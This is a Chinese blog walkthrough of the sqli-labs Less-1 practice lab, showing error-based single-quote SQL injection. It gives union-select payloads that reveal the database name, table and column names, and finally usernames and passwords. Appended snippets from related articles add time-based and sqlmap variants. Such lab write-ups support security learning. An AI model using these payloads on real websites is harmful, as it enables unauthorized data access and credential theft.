【SQL注入】Less-1错误型GET单引号字符型注入

最新推荐文章于 2023-06-11 20:11:56 发布
最新推荐文章于 2023-06-11 20:11:56 发布
阅读量337 收藏 1
点赞数
分类专栏: CTF 文章标签: mysql sql sql注入 ctf sqli-labs
原文链接:https://www.anquanlong.com/lab_introduce?lab_id=3
版权
本文介绍了SQL注入中的单引号字符串型注入,通过漏洞复现步骤展示了如何利用错误型GET请求获取数据库信息。讲解了group_concat、information_schema等关键函数的作用,并提供了payload示例来爆开数据库、数据表和数据值。理解这些概念对于网络安全和Web应用防护至关重要。
摘要由CSDN通过智能技术生成

Less-1错误型GET单引号字符型注入

什么是单引号字符串型注入?
通过'的报错进行sql查询,并用mysql能输出字符串型的函数,获取我们想要的数据。

漏洞复现过程

在实验室浏览器打开Less-1

1、发现注入点

输入?id=1 正常;

输入?id=1' 报错,就存在sql注入漏洞。

2、猜id=1显示条件中表的字段

例如输入?id=1' order by 3 --+ 显示正常
再次输入?id=1' order by 4 --+ 显示错误
所以的出,在?id=1查看的这个表有3个字段

3、爆开数据库

payload
?id=-1' union select 1,2,database() --+

4、爆开数据表

payload 
?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

5、表开数据列(字段)

payload
?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

6、爆开数据值

payload
?id=0' union select 1,group_concat(username,0x3a,password),3 from users--+

函数与要点介绍

1、union select 1,group_concat(table_name),3
?id=0等于我们要查询的表,在实验第一步时候,我们得到该查询的表有3个字段;所以我们在构建select时候,必须满足3个字段条件;
例如:select 1,2,3 那么 group_concat(table_name)表示2;这点有点像数组,你必须规定3个值,才能进行正常的赋值后显示。

2、group_concat()
group_concat函数是典型的字符串连接函数;

3、0x3a
0x3a:16进制的分隔符,比如在爆开数据值使用中(username,0x3a,password)表示(username:password)

4、information_schema
表示存储了数据表tables 列columns的元数据信息;用法:常规的sql查询中from xxx查询的元素或表 where xxx查询的条件;
5、database()
列出数据库的库名;
6、table_schema=database()
累出数据库的表名,这里存在赋值。

以上掌握,接下来的实验,仅提供payload和一些用法分析,我们进行下一步实验

Mitch311
关注
专栏目录
Less1-GET-基于错误-单引号-字符
qq_41883052的博客
05-11 308
Less1-GET-基于错误-单引号-字符 文章目录Less1-GET-基于错误-单引号-字符1、寻找注入点2、 开始注入 1、寻找注入点 初始: 页面RUL无id参数 在URL末尾自行添加?id=1 页面显示信息 更改参数id=2,页面显示正常 在id参数末尾加 ’ 号,页面报错,可能存在注入点 分析: 2、 开始注入 ...
sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
luosaierdadi的博客
06-28 413
输入单引号,页面报错,如下图所示根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,多余的步骤不多说了,直接开始爆数据吧。注意 id=非正确值爆库payload?id=-1' union select 1,2,database() --+得到‘security’库名爆表payload?id=-1' unio
sqli-labs从零开始学习日记(二)
sky_die的专栏
05-08 1837
嗯,这次有个很好用的东西SQLMAP,主要是我看的视频里面他们用的是其他的软件
单引号字符注入
热门推荐
Battery的博客
12-14 13万+
判断sql注入漏洞的类:1.数字、2.字符。用and 1=1 和and 1=2来判断。将1=1换成1=2发现没有报错,但不显示信息,说明可以使用字符注入。继续输入and 1=2,页面显示正常,说明不是数字注入漏洞。使用order by,从一开始逐渐增加,一直到报错时停止。通过此处便可以插入更多的sql语句去查询一些信息。id=1,得到用户名和密码。id=1’ and 1=1--+由此可以确认列数为3(因为到4报错)输入and 1=1来,没有变化。可以得到上一步骤账户的密码。
less 函数_sqli-labs注入超详细版(less-1)
weixin_39710251的博客
11-26 167
sql注入是一个很重要安全漏洞,之前学的总是摸棱两可,后来再渗透过程中,经常遇到需要手工注入的情况,这次就从头到尾再做一次,结合mysql数据库一起讲解,希望能给大家带来帮助,顺便自己再一次学习。less-1 是字符注入,提示我们提交一个id试试在url中加入?id=1 正常显示出id为1的账号信息。此时数据库查询语句大概是这样id是字符(这是我本地新建的模拟数据,不是sqli-la...
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入)
weixin_44368248的博客
04-14 654
1.根据图中的提示在url上加上?id=1 2.输入单引号,发现页面报错(通过在url中修改对应的id值。为正常数字、大数字、字符、(单引号、双引号、双单引号、括号)、反斜杆来探测url是否存在注入点) 由报错信息可知,可以通过单引号闭合 3.通过order by +数字来判断当前的字段数,输入order by 10报错,输入order by 5还报错,输入order by 3没有报错,在输入or...
sqli-lab教程——Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符注入)
luosaierdadi的博客
07-06 320
如果看到这个报错信息,第一反应就是布尔盲注、报错注入、时间延迟盲注了下面给出验证时间延迟的盲注:http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+发现明显延迟,说明猜测正确。接下来的思路是通过延迟,依次爆破数据库长度,数据库名,表名,列名,以及字段。布尔和时间延迟盲注建议采用sqlmap去跑。其实本题不能称作盲注,因为存在回显,真正的盲注时不存在回显的,只能根据浏览器加载页面情况,判定是否注入成功。......
GET-ERROR based-Single quotes – String (GET基于错误单引号字符注入) Less-1
water0diamond的博客
03-12 928
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类是否为字符串,用单引号测试,出现‘’’说明id为字符串类 那么下面我们试着添加...
sqlilabs Less-3 GET-Error based - Single quotes with twist string (基于错误的GET单引号变形字符注入)_小白鼠日常
captainLink的博客
06-10 237
sqlilabs-less3通关(小白鼠日常)
【合天网安】SQLi-Labs系列之字符报错注入单引号和括号)
hehigoxqc606的博客
09-01 359
1、点击GET-Error based-Single quotes with twist – string,进入实验界面 在id值后面多加一个单引号,引发报错,根据提示信息,我们可以发现sql语句是使用了单引号和右括号闭合 2、可以在第二或第三字段中用version()函数代替,查看当前数据库的版本,得出版本为5.5.53。 http://localhost/sqli-labs-master/Less-1/?id=-1')+union+select+1,version(),3--+ .
sqli-labs通关-------11lesson-post(基于错误的POST单引号字符注入)
枯藤闲画云
07-05 437
Post 基于表单提交,类似于下图 Sql的注释:--【空格】单行注释 在url中用--+ # 单行注释 /**/ 多行注释 Post注入 个人觉得就是想法设法搞到密码登录或者想办法绕过密码 方法一: 我们先随便输入一个账号密码给账号加上反斜杠看看啥情况,发现有报错,so根据报错字段应该是被单引号隐起来的。...
sqli-labs less1 基于错误的GET单引号字符注入(手工+sqlmap)
weixin_44023403的博客
03-30 732
sqli-labs less1 基于错误的GET单引号字符注入前言一、基于错误的GET单引号字符注入1.手工注入2.sqlmap注入 前言 Sqli-labs 是一个开源且全面的 SQL 注入练习靶场,里面包含很多种类SQL注入,很适合新手来练习。 一、基于错误的GET单引号字符注入 根据题目提示,输入http://127.0.0.1/sqli-labs/Less-1/?id=1显示正常。 1.手工注入 1.判断是数字还是字符,添加单引号(是%27,被浏览器转译了),返回报错; 在单引
sql注入——单引号注入sqli-labs-less1)
pluto_23的博客
07-22 4546
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类注入 3.语句是否能够被恶意修改(如添加单引号,双引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
SQL注入攻击】Single quotes(单引号注入
sm1918451478的博客
10-20 1395
SQL注入攻击】GET-Error based-Single quotes-String(GET基于错误单引号字符注入
sql 单引号_我对SQL注入的认知
weixin_39880318的博客
11-26 515
关于SQL注入1.什么是sql注入sql注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手段。2.sql注入原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。3.如何寻找注入点首先,we...
单引号报错注入---sqli-labs靶场前瞻
yzl_007的博客
08-22 359
单引号报错注入sqli-labs靶场前瞻 第一关 输入?id=1后正常回显 测试注入点: 构造一下payload:?id=1’or ‘1’='1 正常回显 ?id=1’ and ‘1’ = '2 无回显,由此判断此处存在sql注入漏洞,也可以用sqlmap跑一下如下: 测试指定url是否存在sql注入sqlmap -u http://127.0.0.1/sqli-labs/Less-1/?id=1 前面测得具有回显,sqlmap也表示存在union联合查询 先查找列 ?id=1
关于sql注入单引号的解决
最新发布
mochenxue的博客
06-11 639
1. 这边我们采用java的String进行替换为\\",\\ 主要是用于标识这是单引号与前端传来的真正"进行区分,然后写入数据库中。2. 这里我写了一个StringUtil类进行符号的替换和解析。
绕过单引号继续注入
h4ckyou_520的专栏
09-26 1579
<br />Web应用程序一般都会使用数据库来保存各种信息,比如电子商务网站的帐户信息、销售商品的价格,订单、支付细节、和各种不同的权限数值等。数据库中的信息的读取、更新、增加或者删除等都是通过SQL来实现的,因此,在数据交互的环节没有安全过滤净化,则可能易于受到SQL注入攻击,严重的可能导致数据库非法操作,但是随着时间的推移,Web应用程序的开发者安全意识的日渐增强,SQL注入漏洞已经呈下降消失状态,但是之前的Web程序在被动防范 SQL攻击时,还是略显乏力,或者说是考虑不太周全。比如说普遍使用的过滤关键
MySQL联合注入字符注入
m0_50211409的博客
03-27 1743
关于字符注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符注入SQL语句 select*from admin where id='1' 这是字符注入后的语句 我们在传参的时候 ...
SQL注入漏洞检测:单引号字符注入方法详解
本篇主要讲解了单引号字符注入的识别和利用步骤: 1. 类判断: - 首先尝试在URL参数中添加`?id=1' and 1=1`,如果页面返回结果与正常情况相同,说明可能存在注入点。 - 接着尝试`?id=1' and 1=2`,如果此时...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值